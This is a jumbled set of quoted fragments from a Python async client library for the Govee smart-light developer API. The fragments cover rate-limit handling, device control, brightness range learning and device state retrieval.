learned_get_brightness_max = -1", "not possible: {err}\") elif not command in device.support_cmds: err = f\"Command {command} not", "with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status == 200: device.lock_set_until =", "to 0-254 prop_brightness = math.floor( prop_brightness * 254 / 100 ) result =", "100 ) result = self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness =", "\"history\" result = self._devices[device_str] elif seconds_locked: # we just changed something, return state", "using an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request", "err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state", "> 255: err = f\"set_color: invalid value {color}, blue must be within 0", "def _utcnow(self): \"\"\"Helper method to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def", "100 and prop_brightness > 100 ): device.learned_get_brightness_max = ( 100 # assumption, as", "not device: err = f\"Invalid device {device_str}, {device}\" else: if brightness < 0", "429: _LOGGER.warning( f\"Rate limit exceeded, check if other devices also utilize the govee", "import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING =", "= ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text =", "= _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL +", "= {} self._rate_limit_on = 5 # safe available call count for multiple processes", "err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device", "{self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception as", "from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async", "item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured values", "Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd}", "returned from cache: {result}, next state for {device.device} from api allowed in {seconds_locked}", "is counted down from this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate", "self._api_key} return {} @asynccontextmanager async def _api_put(self, *, auth=True, url: str, json): \"\"\"API", "f\"state object returned from cache: {result}, next state for {device.device} from api allowed", "(r, g, b) values\" else: red = color[0] green = color[1] blue =", "state. True: an offline device is shown as off. \"\"\" self._config_offline_is_off = val", "Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage,", "100) if device.learned_set_brightness_max == 100: # set brightness as 0..100 brightness_set = brightness_set_100", "DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json()", "within 0 .. 254\" else: command = \"color\" command_color = {\"r\": red, \"g\":", "if err: _LOGGER.warning(\"error getting state for device %s: %s\", device_str, err, ) self._devices[device_str].error", "{device}\" else: if color_temp < 2000 or color_temp > 9000: err = f\"set_color_temp:", "Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False # init Dict", "requests you're permitted to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number", "= False except Exception as ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\")", "\"history\" self._devices[device_str].color = color return success, err def _get_lock_seconds(self, utcSeconds: int) -> int:", "= _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL +", "-> bool: \"\"\"Check connection to API.\"\"\" try: # this will set self.online await", "to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock =", "json_obj = await response.json() prop_online = False prop_power_state = False prop_brightness = False", "b) values\" else: red = color[0] green = color[1] blue = color[2] if", "seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. Command waiting: {cmd}\") await", "device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device:", "= item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured", "await self._turn(device, \"off\") async def _turn( self, device: Union[str, GoveeDevice], onOff: str )", "= None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device {device_str}\"", "The number of requests remaining in the current rate limit window. _RATELIMIT_RESET =", "device: str model: str device_name: str controllable: bool retrievable: bool support_cmds: List[str] support_turn:", "learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off", "self._config_offline_is_off = None self._learning_storage = learning_storage if not self._learning_storage: # use an internal", "headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def", "return self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a", "locked for {seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device,", "in self._devices: lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice: \"\"\"Single device from", "= color[1] blue = color[2] if red < 0 or red > 255:", "def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set", "self._control( device, command, brightness_set ) if not err: device.learned_set_brightness_max = 100 await self._learn(device)", "rate limiting is active.\"\"\" # do we have requests left? if self.rate_limit_remaining <=", "1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\"", "try: async with request_lambda() as response: self._set_online(True) # we got something, so we", "result and result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool,", "else: command = \"color\" command_color = {\"r\": red, \"g\": green, \"b\": blue} result,", "= 5 # safe available call count for multiple processes self._limit = 100", "List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import", "and bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control", "if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state =", "{result}, next state for {device.device} from api allowed in {seconds_locked} seconds\" ) else:", "show all devices as offline for device in self.devices: device.online = False async", "is some room for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val):", "self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return", "means there is some room for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def", "= \"Rate-Limit-Total\" # The maximum number of requests you're permitted to make per", "support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool online: bool power_state:", "init Dict and entry for device if learning_infos == None: learning_infos = {}", "GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL +", "= online # inform about state change self.events.online(self._online) if not online: # show", "device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s is", "\"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger", "limit window resets in UTC epoch seconds. # return state from hisory for", "timestamp = self._utcnow() json_obj = await response.json() prop_online = False prop_power_state = False", "error message.\"\"\" return await self._turn(device, \"off\") async def _turn( self, device: Union[str, GoveeDevice],", "you're permitted to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of", "= {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL,", "blue = color[2] if red < 0 or red > 255: err =", "set self.online await self.ping() except: pass return self.online async def ping(self) -> Tuple[float,", "is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager", "# use an internal learning storage as long as we run. # we", "request was able to connect to the API.\"\"\" return self._online def _set_online(self, online:", "self, device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness to", "%s is assumed. If the brightness slider doesn't match the actual brightness pull", "err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice],", "elif seconds_locked: # we just changed something, return state from history self._devices[device_str].source =", "api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if you", "): \"\"\"Init with an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION)", "learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off #", "else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is", "some conditions if not is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on", "( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for", "\"brightness\" result, err = await self._control(device, command, brightness_set) if err: # try again", "> 0 return success, err async def _learn(self, device): \"\"\"Persist learned information from", "int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the", "err async def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int, int] )", "def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device, return", "self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return", "next state for {device.device} from api allowed in {seconds_locked} seconds\" ) else: params", "in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET])", "storage as long as we run. # we will need to re-learn every", "limit will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate", ") as response: if response.status == 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS", "= ( 100 # assumption, as we didn't get anything higher ) if", "green < 0 or green > 255: err = f\"set_color: invalid value {color},", "invalid value {color}, green must be within 0 .. 254\" elif blue <", "self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield response @asynccontextmanager", "be reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger", "\"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if", "with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield response", "bool: \"\"\"Given an aiohttp result checks if it is a success result.\"\"\" return", "{self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error", "= device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned", "in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults", "use an internal learning storage as long as we run. # we will", "= await response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in", "finished with the Client without using an async context manager.\"\"\" await self.__aexit__() def", "= 2 # do not send another control within n seconds after controlling", "\"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum", "+ \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate limit header keys", "requests left? if self.rate_limit_remaining <= self.rate_limit_on: # do we need to sleep? sleep_sec", "device {device_str}\" elif not device.retrievable: # device {device_str} isn't able to return state,", "controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another control within", "0 .. 254\" else: command = \"color\" command_color = {\"r\": red, \"g\": green,", "time at which the current rate limit window resets in UTC epoch seconds.", "want to use this Client without an async context manager.\"\"\" self = Govee(api_key,", "retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in", "self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success, err def _get_lock_seconds(self, utcSeconds:", "self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total:", "int] ) -> Tuple[bool, str]: \"\"\"Set color (r, g, b) where each value", "reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be", "def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self,", "online: # show all devices as offline for device in self.devices: device.online =", "devices = {} err = None async with self._api_get(url=_API_DEVICES) as response: if response.status", "brightness > 254: err = f\"set_brightness: invalid value {brightness}, allowed range 0 ..", "0 .. 254\" elif blue < 0 or blue > 255: err =", "device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for", "< 0 or green > 255: err = f\"set_color: invalid value {color}, green", "tuple with (r, g, b) values\" else: red = color[0] green = color[1]", "= learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"],", "self._control(device, command, brightness_set) if err: # try again with 0-100 range if \"API-Error", "== 100: # set brightness as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100", "value {color_temp}, allowed range 2000-9000\" else: command = \"colorTem\" result, err = await", "= \"Rate-Limit-Reset\" # The time at which the current rate limit window resets", "response @asynccontextmanager async def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP Get", "device.device if not device_str in self._devices: device = None # disallow unknown devices", "_LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async", "await self.__aenter__() return self async def close(self): \"\"\"Use close when your are finished", "limit exceeded, check if other devices also utilize the govee API\" ) limit_unknown", "config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global", "color[2] if red < 0 or red > 255: err = ( f\"set_color:", "GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async", "values if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max =", "f\"state returned from API: {json_obj}, resulting state object: {result}\" ) else: errText =", "range 0-255 \"\"\" success = False err = None device_str, device = self._get_device(device)", "self._control(device, command, params) success = False if not err: success = self._is_success_result_message(result) if", "class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session", "result = await response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for item", "threshold {val} must be below {self._limit}\" ) if val < 1: raise GoveeError(f\"Rate", "request_lambda() as response: self._set_online(True) # we got something, so we are online self._track_rate_limit(response)", "Union[str, GoveeDevice], command: str, params: Any ) -> Tuple[Any, str]: \"\"\"Control led strips", "when device is offline. None: default, use config_offline_is_off from learning, or False by", "- start) * 1000) if response.status == 200: if \"Pong\" == result: ping_ok_delay", "result self._devices = devices return self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) ->", "None: learning_infos = {} if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() #", "str]: \"\"\"Turn on a device, return success and error message.\"\"\" return await self._turn(device,", "\"\"\"Turn on a device, return success and error message.\"\"\" return await self._turn(device, \"on\")", "-> Tuple[float, str]: \"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start", "a call when rate limiting is active.\"\"\" # do we have requests left?", "device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until)", "object returned from cache: {result}, next state for {device.device} from api allowed in", "def config_offline_is_off(self, val: bool): \"\"\" Set global behavour when device is offline. None:", "return await self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]:", "await asyncio.sleep(1) # set brightness as 0..254 brightness_set = brightness brightness_result = brightness_set", "self async def close(self): \"\"\"Use close when your are finished with the Client", "\"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not", "response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls. This", "success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result", "= GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in", "if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check if other devices also", "GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None,", "a device, return success and error message.\"\"\" return await self._turn(device, \"off\") async def", "bool config_offline_is_off: bool # this is the learning config, possibly overridden by a", ") as response: yield response @asynccontextmanager async def _api_get(self, *, auth=True, url: str,", "str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success = False err = None device_str,", "= await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"]", "254\" else: if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't", "an event on change.\"\"\" if self._online != online: self._online = online # inform", "0 or red > 255: err = ( f\"set_color: invalid value {color}, red", "state property '{prop}'\") if not prop_online: if self.config_offline_is_off is not None: # global", "the current rate limit window resets in UTC epoch seconds. # return state", "in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit", "device: err = f\"Invalid device {device_str}, {device}\" else: if not device.controllable: err =", "int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this", "\"\"\" err = None await self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True)", "= None async with self._api_get(url=_API_PING, auth=False) as response: result = await response.text() delay", "-> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock", "we got something, so we are online self._track_rate_limit(response) # return the async content", "anything higher ) if prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device) if", "return success, err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\"", "\"\"\" device_str = device if isinstance(device, GoveeDevice): device_str = device.device if not device_str", "float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown", "state # defaults by some conditions if not is_retrievable: learned_get_brightness_max = -1 if", "self._utcnow() json_obj = await response.json() prop_online = False prop_power_state = False prop_brightness =", "self, device: Union[str, GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set", "lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield response @asynccontextmanager async", "await self._learn(device) if device.learned_get_brightness_max == 100: # scale range 0-100 up to 0-254", "if not device_str in self._devices: device = None # disallow unknown devices elif", "= await self._learning_storage._read_cached() changed = False # init Dict and entry for device", "\"g\": green, \"b\": blue} result, err = await self._control(device, command, command_color) if not", "not possible: {err}\") return result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states", "await response.text() delay = int((time.time() - start) * 1000) if response.status == 200:", "\"\"\"Set the online state and fire an event on change.\"\"\" if self._online !=", "err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness", "get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err", "where each value may be in range 0-255 \"\"\" success = False err", "val: bool): \"\"\" Set global behavour when device is offline. None: default, use", "client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self", "on a device, return success and error message.\"\"\" return await self._turn(device, \"on\") async", "{device_str} is locked for {seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json =", "err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif", "response.status == 200: timestamp = self._utcnow() json_obj = await response.json() prop_online = False", "int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining:", "def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with", "\"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None async with", "utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock = 0 return seconds_lock async", "async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200: timestamp = self._utcnow()", "remaining calls that trigger rate limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate", "property '{prop}'\") if not prop_online: if self.config_offline_is_off is not None: # global option", "state from hisory for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2", "err = await self._control(device, command, command_color) if not err: success = self._is_success_result_message(result) if", "= prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp =", "device {device_str}, {device}\" else: if color_temp < 2000 or color_temp > 9000: err", "None err = None if not device: err = f\"Invalid device {device_str}, {device}\"", "online state and fire an event on change.\"\"\" if self._online != online: self._online", "): device.learned_get_brightness_max = ( 100 # assumption, as we didn't get anything higher", "learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume we are online", "self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage]", "command_color) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source", "invalid value {color_temp}, allowed range 2000-9000\" else: command = \"colorTem\" result, err =", "about state change self.events.online(self._online) if not online: # show all devices as offline", "device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if we don't sleep await asyncio.sleep(1)", "= self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color", "rate limit will be reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining", "success, err async def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int, int]", "GoveeError( f\"Rate limiter threshold {val} must be below {self._limit}\" ) if val <", "value {color}, red must be within 0 .. 254\" ) elif green <", "not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\"", "each value may be in range 0-255 \"\"\" success = False err =", "be within 0 .. 254\" elif blue < 0 or blue > 255:", ") -> Tuple[bool, str]: \"\"\"Set color (r, g, b) where each value may", "and error message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice])", "make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests remaining in", "in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on =", "raise GoveeError( f\"Rate limiter threshold {val} must be below {self._limit}\" ) if val", "GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success =", "result = await response.text() delay = int((time.time() - start) * 1000) if response.status", "self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: command =", "Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\" device_str,", "dataclasses import dataclass from datetime import datetime from events import Events from typing", "{\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status ==", "prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state", "and device_str in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device", "def _control( self, device: Union[str, GoveeDevice], command: str, params: Any ) -> Tuple[Any,", "number of requests you're permitted to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" #", "_RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ): try:", "success, err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock", "@property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be reset.\"\"\" return self._limit_reset", "g, b) values\" else: red = color[0] green = color[1] blue = color[2]", "use config_offline_is_off from learning, or False by default. False: an offline device doesn't", "\"\"\"Control led strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\": command,", "_LOGGER.warning( f\"Rate limit exceeded, check if other devices also utilize the govee API\"", "color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off", "cache last get_devices result self._devices = devices return self.devices, err def _get_device(self, device:", "controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem:", "be within 0 .. 254\" else: command = \"color\" command_color = {\"r\": red,", "state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device %s:", "= Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def close(self): \"\"\"Use close when", "error_response: def __init__(self, err_msg): self._err_msg = err_msg status = -1 async def text(self):", "device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err async def get_states(self)", "( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL", "changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s", "@property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. Defaults to 5, which", "ex: # we are offline self._set_online(False) err = \"error from aiohttp: %s\" %", "the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\"", "%s: %s\", device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error", "async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device,", "will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit", "f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get", "prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp = timestamp", "the remaining calls that trigger rate limiting.\"\"\" if val > self._limit: raise GoveeError(", "blue} result, err = await self._control(device, command, command_color) if not err: success =", "self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status == 200: device.lock_set_until = (", "response.status == 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = (", "support_color_tem: bool online: bool power_state: bool brightness: int color: Tuple[int, int, int] color_temp:", "0..100 as 0..254 didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err", "elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if", "on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return", "# somehow these are all dicts with one element if \"online\" in prop:", "result = await response.json() else: text = await response.text() err = f\"API-Error {response.status}", "range for %s is assumed. If the brightness slider doesn't match the actual", "other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls", "devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err = await self._get_device_state(device_str)", "= 100 self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage =", 